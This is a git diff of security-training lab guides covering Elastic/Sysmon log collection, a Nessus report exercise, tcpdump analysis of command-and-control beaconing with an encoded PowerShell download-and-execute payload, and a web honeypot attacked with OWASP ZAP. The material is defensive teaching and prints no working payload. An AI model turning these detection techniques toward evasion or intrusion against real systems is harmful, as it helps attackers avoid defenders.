-![Sysmon is Running](./images/sysmon_running.png)
-
-Now that Sysmon is running on our system, we need to configure our **Elastic agent** to gather these logs.
-
-Sign into your **Elastic Cloud account** using the following link:
-
-[Elastic Cloud Login](https://cloud.elastic.co/login "https://cloud.elastic.co/login")
-
-
-Once logged in, navigate to **"Integrations"** through the navigation menu.
-
-When you log in to Elastic, you might see the following screen first. If so, go ahead and click on our deployment that we created in [Part One](./elk_in_the_cloud.md "Elk in the Cloud") (ELK in the Cloud)
-
-![](./images/incaseyourelost.png)
-	
-Once you do this, you can access the navigation bar by clicking the three lines in the upper left and then navigate to Integrations. 
-
-You may have to scroll to the bottom to find the **"Management"** section. 
-
-![](./images/navigationmenu.png)
-
-At the top of the page enter **"windows"** into the search bar.  Select the **Windows** option outlined with the red square below.
-
-![Select Windows](./images/which_windows.PNG)
-
-***
-Add this integration.
-***
-
-![Add Windows](./images/installation.PNG)
-
-
-The next screen you see will have a lot of options on it. Luckily, we only care that one is selected: **Sysmon Operational**
-
-By default, this option should be active, but please double check to be sure. 
-
-**Note:**
-You will have to scroll down the page for a bit in order to find it. 
-	
-![Ensure Sysmon is Selected](./images/sysmon_selected.png)
-
-***
-Now save the Integration by clicking **Save and Continue** in the bottom right.
-***
-
-![Save the Integration](./images/saveandnext.PNG)
-
-***
-You will then see the following pop-up prompt. Please click **"Add elastic agent to your hosts".**
-***
-
-![Add Elastic Host](./images/addelastichost.PNG)
-
-***
-Navigate back to the Integrations menu, find the **"Installed integrations"** tab.
-***
-
-![](./images/backtointegrations.png)
-
-![](./images/clickinstalledintegrations.png)
-
-In [part one](./elk_in_the_cloud.md "Elk in the Cloud"), we selected an Elastic Security configuration. In doing so, **"Endpoint Security"** and **"System"** are automatically installed in our **Integrations**.
-
-![Installed Integrations](./images/integrations_extras.PNG)
-
-At this point, play around on the computer that has **Elastic Agent **installed.  Move files around, create files, start programs, make a few Google searches.  This will generate some logs to ensure that we have Sysmon logs reaching our cloud.
-
-After you have created some log activity, navigate to **"Discover"** by accessing the hamburger menu on the top left.
-
-![Navigate to Discover](./images/navigatetodiscover.png)
-
-***
-We will then create a filter:
-***
-
-![](./images/createfilter.png)
-
-Set a filter on your data to limit your results to sysmon data.  This can be done by searching the **"data_stream.dataset"** field for **"windows.sysmon_operational"** data. We add a custom label of **"All Done!"**. 
-
-![Filter Data](./images/applied_filter.PNG)
-
-***
-Now click **"add filter"**. Your filter should now be set.
-***
-
-![Sysmon Results](./images/final.PNG)
-
-If you have a result, and not an error, your Sysmon data is being collected and sent to **Elastic**.
-
-***
-***Continuing on to the next Lab?***
-
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
-
-***Finished with the Labs?***
-
-
-Please be sure to destroy the lab environment!
-
-[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
-
----
diff --git a/IntroClassFiles/Tools/IntroClass/nessus/Nessus.md b/IntroClassFiles/Tools/IntroClass/nessus/Nessus.md
index f657c19f..c123d330 100755
--- a/IntroClassFiles/Tools/IntroClass/nessus/Nessus.md
+++ b/IntroClassFiles/Tools/IntroClass/nessus/Nessus.md
@@ -11,13 +11,13 @@ Specifically, look at service headers and files.
 
 To open this lab, start file explorer:
 
-![](attachments/OpeningFileExplorer.png)
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/e185c888-7dfb-4add-ae73-55c4c9b4278f" />
 
 Then, navigate to the tools folder and open the **NessusLab** file:
 
 ![](attachments/Navintolabs.png)
 
-![](attachments/nessus_navtonessus.png)
+<img width="1118" height="555" alt="2026-02-23_12-43" src="https://github.com/user-attachments/assets/99d6da3e-9545-46b2-9427-e5ef7fa35bab" />
 
 When the file opens, please focus on service banners and files.
 
@@ -126,3 +126,4 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/Nessus.md b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/Nessus.md
new file mode 100755
index 00000000..7fce9213
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/Nessus.md
@@ -0,0 +1,131 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# Nessus Lab
+
+In this lab we will be looking at a vulnerability report.
+
+However, we will be looking at it in a different way.  We will not be looking at the **"Highs and Criticals"**.  Instead, we want to focus on the **"Lows and Mediums"**.  We are doing this because these are often the vulnerabilities we exploit and are often missed by the organizations we test.
+
+Specifically, look at service headers and files.
+
+To open this lab, start file explorer:
+
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/e185c888-7dfb-4add-ae73-55c4c9b4278f" />
+
+Then, navigate to the tools folder and open the **NessusLab** file:
+
+![](attachments/Navintolabs.png)
+
+<img width="1118" height="555" alt="2026-02-23_12-43" src="https://github.com/user-attachments/assets/99d6da3e-9545-46b2-9427-e5ef7fa35bab" />
+
+When the file opens, please focus on service banners and files.
+
+![](attachments/nessus_home.png)
+
+
+Now, we are going to have you hunt for **"Low and Medium"** Vulnerabilities that needed to be addressed.
+
+No cheating...
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+Seriously...
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+\
+Ok.
+
+Below is the Telnet server that has issues.
+
+Notice that it is a prompt.  This means there is no authentication to access this server. 
+
+![](attachments/nessus_telnetserver.png)
+
+Note that two of the servers require authentication and one does not.
+
+Check out the office files shown with the web server sitemap:
+
+![](attachments/nessus_officefiles.png)
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-30.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-30.png
new file mode 100755
index 00000000..7ea480f6
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-30.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-53.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-53.png
new file mode 100755
index 00000000..ff3f63a8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-12-53.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-13-36.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-13-36.png
new file mode 100755
index 00000000..f002ee55
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-13-36.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-20-18.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-20-18.png
new file mode 100755
index 00000000..9c7a11d7
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-20-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-24-01.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-24-01.png
new file mode 100755
index 00000000..3279b8f3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Clipboard_2020-06-18-09-24-01.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Navintolabs.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Navintolabs.png
new file mode 100644
index 00000000..9fa4f345
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/Navintolabs.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/OpeningFileExplorer.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/OpeningFileExplorer.png
new file mode 100644
index 00000000..7c3066b3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/OpeningFileExplorer.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_home.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_home.png
new file mode 100644
index 00000000..3da7e45e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_home.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_navtonessus.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_navtonessus.png
new file mode 100644
index 00000000..5eb7c6de
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_navtonessus.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_officefiles.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_officefiles.png
new file mode 100644
index 00000000..66fa926a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_officefiles.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_telnetserver.png b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_telnetserver.png
new file mode 100644
index 00000000..ac1096b1
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/nessusIntroClass/attachments/nessus_telnetserver.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/pcap/AdvancedC2PCAPAnalysis.md b/IntroClassFiles/Tools/IntroClass/pcap/AdvancedC2PCAPAnalysis.md
deleted file mode 100644
index 58b29726..00000000
--- a/IntroClassFiles/Tools/IntroClass/pcap/AdvancedC2PCAPAnalysis.md
+++ /dev/null
@@ -1,178 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
- 
-
-# Advanced C2 PCAP Analysis 
-
-  
-
-First, we will need to open the Kali Terminal. 
-
-![image](https://github.com/user-attachments/assets/5e926625-9b95-4c77-9398-819b30f84051)
-
-
-Now, we should move to the proper directory.
-  
-
-`cd /opt/covert` 
-
-  
-
-It should look like this: 
-
-  
-
-![image](https://github.com/user-attachments/assets/bb84eda1-86bf-411a-8d38-45be7ac587eb)
-
-
-  
-
-Next, we will run some tcpdump commands to analyze the pcap file. 
-
-  
-
-`sudo tcpdump -nA -r covertC2.pcap | less` 
-
-![image](https://github.com/user-attachments/assets/4e6077f3-1c27-4b57-8aad-3f199737b303)
-
-
-  
-
-The –nA option tells tcpdump not to resolve names (n) and print the ASCII text of the packet (A). You are reading in a file with the (-r) option and piping the data ( | ) through less so you can view it section by section.  
-
-  
-
-It should look like this: 
-
-  
-
-![image](https://github.com/user-attachments/assets/523443ca-8f56-47df-81d7-b9d112c49157)
-
-
-  
-
-Hit spacebar till you see a line with VIEWSTATE in it. 
-
-  
-
-It should look like this: 
-
-  
-
-![image](https://github.com/user-attachments/assets/ae1ae54e-2f90-4c58-89c1-3c920f719a1e)
-
-
-  
-
-Press `q` to close the tcpdump session. 
-
-  
-
-One of the interesting things about many malware specimens we review these days is how they “wait” for the attacker to communicate with them. For example, in the sample malware traffic we are reviewing, the backdoor “beacons” out every 30 seconds. This is for two reasons. One is because the attacker might not be at a system waiting for a command shell on a compromised target and. Secondly, because long-term established sessions tend to attract attention. This is because with protocols such as HTTP, the sessions are generally short burst sessions for multiple objects. When this backdoor was created, we wanted it to act like real HTTP. So, it had to have an asynchronous component to it.  
-  
-
-In the capture, the SYN packets are roughly 30 seconds apart for the beacon traffic.  
-
-  
-
-To see the SYN packets, simply run the following command:  
-
-  
-
-`sudo tcpdump -r covertC2.pcap 'tcp[13] = 0x02' | less` 
-
-  
-
-It should look like this: 
-
-  
-
-![image](https://github.com/user-attachments/assets/13a5ca2e-49de-473d-b322-8a930115781c)
-
-
-  
-
-This filter shows all packets with the SYN bit (0x02) set in the 13th byte offset in the TCP/IP header (tcp[13]).  
-
-  
-
-  
-
-Note the time difference between the packets. You can see at the beginning that they are 30 seconds apart.  
-
-  
-
-Run the following command to grep any other instances of “hidden”:  
-
-  
-
-`sudo tcpdump -nA -r covertC2.pcap | grep "hidden"` 
-
-  
-
-It should look like this: 
-
-  
-![image](https://github.com/user-attachments/assets/d0c3b58f-94b6-4bf8-93a8-8564257be69b)
-
-
-  
-
-You should see a number of returned lines. If you look at these values, you see what appears to be random data followed by an = sign. This could mean it is Base64 encoded data. Does this mean it is evil? Not necessarily. It just means it is interesting.  
-
-  
-
-However, you can quickly prove or disprove this hypothesis by using Python to decode the data. If it is Base64, it will decode, and you will see ASCII characters. If not, you will keep looking.  
-
-  
-
-Either way, it is a fun opportunity to play with Python. 
-
-  
-
-Well now, when you look at the VIEWSTATE parameters, you can see they are not consistent.  
-
-  
-
-You can also see that it appears to be Base64 encoded.  
-
-  
-
-  
-
-Now for a challenge. What is this Base64 encoded data? 
-
-  
-
-  
-
-Here is one solution, 
-
-  
-
-![](attachment/Clipboard_2021-03-12-08-46-15.png) 
-
-  
-
-When you do this, you can quickly see that the Base64 encoded data is a PowerShell command to download and execute Powersploit, which then invokes a Metasploit Meterpreter on the system.  
-
-  
-
-Attackers can also pseudo-randomly include extra characters designed to break automated decoding. This is a remarkably simple, yet effective, technique that then requires a responder to manually find and remove the ever-changing characters in order to decode the communications. 
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
- 
-
- 
diff --git a/IntroClassFiles/Tools/IntroClass/webhoneypot/webhoneypot.md b/IntroClassFiles/Tools/IntroClass/webhoneypot/webhoneypot.md
deleted file mode 100644
index 26fd2c19..00000000
--- a/IntroClassFiles/Tools/IntroClass/webhoneypot/webhoneypot.md
+++ /dev/null
@@ -1,175 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
- 
-
-# Web Honeypot 
-
-  
-
-In this lab we will be running a very simple web honeypot.  Basically, it runs a fake Outlook Web Access page and logs the attacks.  
-
-  
-
-This is a good approach as attackers constantly go after anything that looks like an authentication portal. 
-
-  
-
-Let's get started. 
-
-  
-
-First we will need to open a Kali Terminal:
-
-![image](https://github.com/user-attachments/assets/ef855265-729c-4054-ad3e-759c9ad3a3ec)
-
-
-Next, change directories to the /opt/owa-honeyport directory: 
-
-  
-
-`cd /opt/owa-honeypot/` 
-
-  
-
-![image](https://github.com/user-attachments/assets/85d0b4c0-b933-459f-8ca6-45ec5687acc6)
-
-
-  
-
-Now, let's start the honeypot: 
-
-  
-
-`sudo python3 owa_pot.py` 
-
-  
-
-It should look like this: 
-
-  ![image](https://github.com/user-attachments/assets/c7e33623-5050-4772-8767-e22fe0da9259)
-
-  
-
-Now, let's start another Kali Terminal. 
-
-![image](https://github.com/user-attachments/assets/ef855265-729c-4054-ad3e-759c9ad3a3ec)
-
-
-
-Let's get your Kali IP address. 
-
-  
-
-`ifconfig` 
-
-![image](https://github.com/user-attachments/assets/0f927bdf-a032-41a1-bd40-68fb41fd9959)
-
-
-Then, navigate to the owa-honeypot directory. 
-
-  
-
-`cd /opt/owa-honeypot/` 
-
-  
-![image](https://github.com/user-attachments/assets/ec61ff20-6aae-44fa-b920-fcb723f3c3aa)
-
-
-  
-
-Now, lets tail the dumppass log. 
-
-  
-
-`tail -f dumpass.log` 
-
-  
-
-![image](https://github.com/user-attachments/assets/1877a55c-9717-4428-a08b-38c6ea40af2f)
-
-
-  
-
-Now, let's open a browser window and surf to the honeypot: 
-
-  
-
-`http://YOURLINUXIP` 
-
-  
-
-Now, try a bunch of User IDs and passwords. 
-
-  
-
-Now, go back to the Kali Terminal with the log and you should see the IP address and USerID/Password of the attempts. 
-
-  
-![image](https://github.com/user-attachments/assets/71dbd425-29d1-46b1-9ed1-dc32d05fd595)
-
-  
-
-Now, let's attack it. 
-
-  
-
-Select OWASP ZAP on your desktop. 
-
-  
-
-![image](https://github.com/user-attachments/assets/6493b57a-bb9d-4886-8e15-735ce63a93c7)
-
-  
-
-Once ZAP! opens, select Automated Scan: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-48-15.png) 
-
-  
-
-When Automated Scan opens, please put you Kali Linux IP in the URL to attack box and select Attack. 
-
-  
-
-It should look like this: 
-
-![image](https://github.com/user-attachments/assets/c291f9f9-3730-49a6-a874-7d7df5dc5d8e)
-
-
-After a while, you should see some attack strings in your Logs. 
-
-  
-![image](https://github.com/user-attachments/assets/00bb3500-361f-4d28-9bb5-c5769d50cc53)
-
-  
-
-Yes...  Some attack tools are as obvious as ZAP:ZAP. 
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
-  
-
- 
-
- 
diff --git a/IntroClassFiles/Tools/WINlab-64bit.exe b/IntroClassFiles/Tools/WINlab-64bit.exe
deleted file mode 100644
index 70768911..00000000
Binary files a/IntroClassFiles/Tools/WINlab-64bit.exe and /dev/null differ
diff --git a/IntroClassFiles/Tools/final.apk b/IntroClassFiles/Tools/final.apk
deleted file mode 100644
index a28e86ac..00000000
Binary files a/IntroClassFiles/Tools/final.apk and /dev/null differ
diff --git a/IntroClassFiles/Tools/format.css b/IntroClassFiles/Tools/format.css
deleted file mode 100755
index 5e1e05bc..00000000
--- a/IntroClassFiles/Tools/format.css
+++ /dev/null
@@ -1,12 +0,0 @@
-pre { 
-    background-color:#D0D0CF;
-}
-
-table {
-    border-collapse:collapse;
-}
-
-td, th {
-    padding:5px;
-    border: 1px solid black;
-}
\ No newline at end of file
diff --git a/IntroClassFiles/index.html b/IntroClassFiles/index.html
deleted file mode 100755
index 188853aa..00000000
--- a/IntroClassFiles/index.html
+++ /dev/null
@@ -1,215 +0,0 @@
-<!DOCTYPE html>
-<html>
-<!--
-   This is MDwiki v0.6.2
-   (C) 2013 by Timo Dörr and contributors. This software is licensed
-   under the terms of the GNU GPLv3 with additional terms applied.
-   See https://github.com/Dynalon/mdwiki/blob/master/LICENSE.txt for more detail.
-   See http://github.com/Dynalon/mdwiki for a copy of the source code.
--->
-<head>
-    <title>Active Defense Harbinger Distribution</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta name="fragment" content="!">
-    <link rel="shortcut icon" type="image/x-icon" href="favicon.png" />
-    <meta charset="UTF-8">
-    <style type="text/css">
-    /* hide the main content while we assemble everything */
-    .md-hidden-load { display: none; }
-	
-    .anchor-highlight {
-        font-size: 0.7em;
-        margin-left: 0.25em;
-    }
-    /* for pageContentMenu */
-    #md-page-menu {
-            position: static;
-    }
-    #md-page-menu a.active {
-        /* background-color: rgba(0, 0, 0, 0.01); */
-        font-weight: bold;
-        padding-left: 6px;
-
-    }
-    @media (min-width: 992px) {
-        #md-page-menu.affix {
-            position: fixed;
-        }
-    }
-    @media (min-width: 768px) {
-        .md-float-left .col-sm-8, .md-float-right .col-sm-8 {
-            max-width: 66.67%;
-        }
-        .md-float-left .col-sm-4, .md-float-right .col-sm-4  {
-            max-width: 33.33%;
-        }
-        .md-float-left .col-sm-2, .md-float-right .col-sm-2 {
-            max-width: 16.67%;
-        }
-
-    }
-    @media (max-width: 992px) {
-        a.forkmeongithub {
-            display: none;
-        }
-    }
-    @media (max-width: 768px) {
-        /* don't use floating for smaller screens */
-        .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-        .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-    }
-
-    .md-floatenv .md-text {
-        /* md-text is not of md-col-* but needs the spacing */
-        margin-left: 15px;
-        margin-right: 15px;
-    }
-
-    /* float images */
-    .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-        width: auto;
-    }
-    .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-        float: right !important;
-        width: auto;
-    }
-    #md-all .md-copyright-footer {
-        background-color: !important;
-        font-size: smaller;
-        padding: 1em;
-    }
-    </style>
-
-<!-- START extlib/css/highlight.github.css -->
-<style id="style:extlib/css/highlight.github.css">pre code{display:block;padding:.5em;color:#333;background:#f8f8ff}pre .comment,pre .template_comment,pre .diff .header,pre .javadoc{color:#998;font-style:italic}pre .keyword,pre .css .rule .keyword,pre .winutils,pre .javascript .title,pre .nginx .title,pre .subst,pre .request,pre .status{color:#333;font-weight:bold}pre .number,pre .hexcolor,pre .ruby .constant{color:#099}pre .string,pre .tag .value,pre .phpdoc,pre .tex .formula{color:#d14}pre .title,pre .id{color:#900;font-weight:bold}pre .javascript .title,pre .lisp .title,pre .clojure .title,pre .subst{font-weight:normal}pre .class .title,pre .haskell .type,pre .vhdl .literal,pre .tex .command{color:#458;font-weight:bold}pre .tag,pre .tag .title,pre .rules .property,pre .django .tag .keyword{color:#000080;font-weight:normal}pre .attribute,pre .variable,pre .lisp .body{color:#008080}pre .regexp{color:#009926}pre .class{color:#458;font-weight:bold}pre .symbol,pre .ruby .symbol .string,pre .lisp .keyword,pre .tex .special,pre .prompt{color:#990073}pre .built_in,pre .lisp .title,pre .clojure .built_in{color:#0086b3}pre .preprocessor,pre .pi,pre .doctype,pre .shebang,pre .cdata{color:#999;font-weight:bold}pre .deletion{background:#fdd}pre .addition{background:#dfd}pre .diff .change{background:#0086b3}pre .chunk{color:#aaa}</style><!-- END extlib/css/highlight.github.css -->
-<!-- START extlib/css/bootstrap-3.0.0.min.css -->
-<style id="style:extlib/css/bootstrap-3.0.0.min.css">/*!
- * Bootstrap v3.0.0
- *
- * Copyright 2013 Twitter, Inc
- * Licensed under the Apache License v2.0
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Designed and built with all the love in the world by @mdo and @fat.
- *//*! normalize.css v2.1.0 | MIT License | git.io/normalize */article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{margin:.67em 0;font-size:2em}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em}pre{white-space:pre-wrap}q{quotes:"\201C" "\201D" "\2018" "\2019"}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}fieldset{padding:.35em .625em .75em;margin:0 2px;border:1px solid #c0c0c0}legend{padding:0;border:0}button,input,select,textarea{margin:0;font-family:inherit;font-size:100%}button,input{line-height:normal}button,select{text-transform:none}button,html input[type="button"],input[type="reset"],input[type="submit"]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[disabled]{cursor:default}input[type="checkbox"],input[type="radio"]{padding:0;box-sizing:border-box}input[type="search"]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type="search"]::-webkit-search-cancel-button,input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}pre,blockquote{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:2cm .5cm}p,h2,h3{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.table td,.table th{background-color:#fff!important}.btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #000}.table{border-collapse:collapse!important}.table-bordered th,.table-bordered td{border:1px solid #ddd!important}}*,*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}button,input,select[multiple],textarea{background-image:none}a{color:#428bca;text-decoration:none}a:hover,a:focus{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}.img-responsive{display:block;height:auto;max-width:100%}.img-rounded{border-radius:6px}.img-thumbnail{display:inline-block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0 0 0 0);border:0}p{margin:0 0 10px}.lead{margin-bottom:20px;font-size:16.099999999999998px;font-weight:200;line-height:1.4}@media(min-width:768px){.lead{font-size:21px}}small{font-size:85%}cite{font-style:normal}.text-muted{color:#999}.text-primary{color:#428bca}.text-warning{color:#c09853}.text-danger{color:#b94a48}.text-success{color:#468847}.text-info{color:#3a87ad}.text-left{text-align:left}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1}h1 small,h2 small,h3 small,h4 small,h5 small,h6 small,.h1 small,.h2 small,.h3 small,.h4 small,.h5 small,.h6 small{font-weight:normal;line-height:1;color:#999}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1,.h1{font-size:36px}h2,.h2{font-size:30px}h3,.h3{font-size:24px}h4,.h4{font-size:18px}h5,.h5{font-size:14px}h6,.h6{font-size:12px}h1 small,.h1 small{font-size:24px}h2 small,.h2 small{font-size:18px}h3 small,.h3 small,h4 small,.h4 small{font-size:14px}.page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}ul,ol{margin-top:0;margin-bottom:10px}ul ul,ol ul,ul ol,ol ol{margin-bottom:0}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}dl{margin-bottom:20px}dt,dd{line-height:1.428571429}dt{font-weight:bold}dd{margin-left:0}@media(min-width:768px){.dl-horizontal dt{float:left;width:160px;overflow:hidden;clear:left;text-align:right;text-overflow:ellipsis;white-space:nowrap}.dl-horizontal dd{margin-left:180px}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}}abbr[title],abbr[data-original-title]{cursor:help;border-bottom:1px dotted #999}abbr.initialism{font-size:90%;text-transform:uppercase}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote p{font-size:17.5px;font-weight:300;line-height:1.25}blockquote p:last-child{margin-bottom:0}blockquote small{display:block;line-height:1.428571429;color:#999}blockquote small:before{content:'\2014 \00A0'}blockquote.pull-right{padding-right:15px;padding-left:0;border-right:5px solid #eee;border-left:0}blockquote.pull-right p,blockquote.pull-right small{text-align:right}blockquote.pull-right small:before{content:''}blockquote.pull-right small:after{content:'\00A0 \2014'}q:before,q:after,blockquote:before,blockquote:after{content:""}address{display:block;margin-bottom:20px;font-style:normal;line-height:1.428571429}code,pre{font-family:Monaco,Menlo,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}pre.prettyprint{margin-bottom:20px}pre 